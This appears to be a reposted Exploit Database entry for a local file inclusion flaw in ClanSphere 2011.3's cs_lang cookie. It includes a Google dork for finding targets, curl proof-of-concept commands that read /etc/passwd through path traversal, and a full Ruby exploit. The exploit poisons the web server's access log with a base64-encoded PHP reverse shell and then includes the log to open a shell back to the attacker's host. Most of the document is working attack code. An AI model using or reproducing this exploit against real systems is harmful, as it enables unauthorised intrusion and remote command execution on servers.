ClanSphere 2011.3 – ‘cs_lang’ Cookie Local File Inclusion

• Exploit Database
• 57 阅读

• 作者： blkhtc0rp
  日期： 2012-10-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/22181/

• Exploit Title: ClanSphere 2011.3 (cs_lang cookie parameter) Local File Include Vulnerability
  Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere
  Date: 10/22/2012
  Author: Marco Tulio ~> blkhtc0rp
  Vendor Homepage: http://www.csphere.eu
  Version: 2011.3
  Tested on: Centos 5.7, Ubuntu 8.04 and FreeBSD 8
  
  
  Poc:
  curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png"
  curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd"
  curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00"
  
  
  Exploit:
  
  #!/usr/bin/ruby
  
  #
  # ClanSphere 2011.3 (cs_lang) LFI exploit by blkhtc0rp
  #
  #
  # ./clanSphere.rb "http://server/apps/clansphere_2011.3/" "/var/log/httpd/access_log" 192.168.1.221 12345
  # [x] ClanSphere 2011.3 LFI Exploit
  # [x] Author: blkhtc0rp
  # [x] Reverse shell on 192.168.1.221:12345
  #
  #
  # nc -lp 12345
  # pwd
  # /var/www/html/apps/clansphere_2011.3
  # id
  # uid=48(apache) gid=48(apache) groups=48(apache)
  #
  require 'net/http'
  require 'base64'
  
  host = ARGV[0]
  log = ARGV[1]
  ip = ARGV[2]
  rev_port = ARGV[3]
  
  abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4
  
  uri = URI.parse(host)
  
  cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png"
  headers = { 'Cookie' => cookie, 
  'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)' 
  }
  
  # Tiny shell from the net lol.
  shell = "\$ip = \'#{ip}\';\$port = #{rev_port}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);"
  
  enc = Base64.encode64(shell).gsub("\n",'')
  sh_encoded = "<?php eval(base64_decode(#{enc}));?>"
  
  
  puts "[x] ClanSphere 2011.3 LFI Exploit"
  puts "[x] Author: blkhtc0rp"
  puts "[x] Reverse shell on #{ip}:#{rev_port}"
  
  # Inject base64 shell
  req = Net::HTTP::Get.new(sh_encoded)
  status = Net::HTTP.new(uri.host, uri.port).start do |http|
   http.request(req)
  end
  
  # Exec shell
  req2 = Net::HTTP::Get.new(uri.path, headers)
  status = Net::HTTP.new(uri.host, uri.port).start do |http|
   http.request(req2)
  end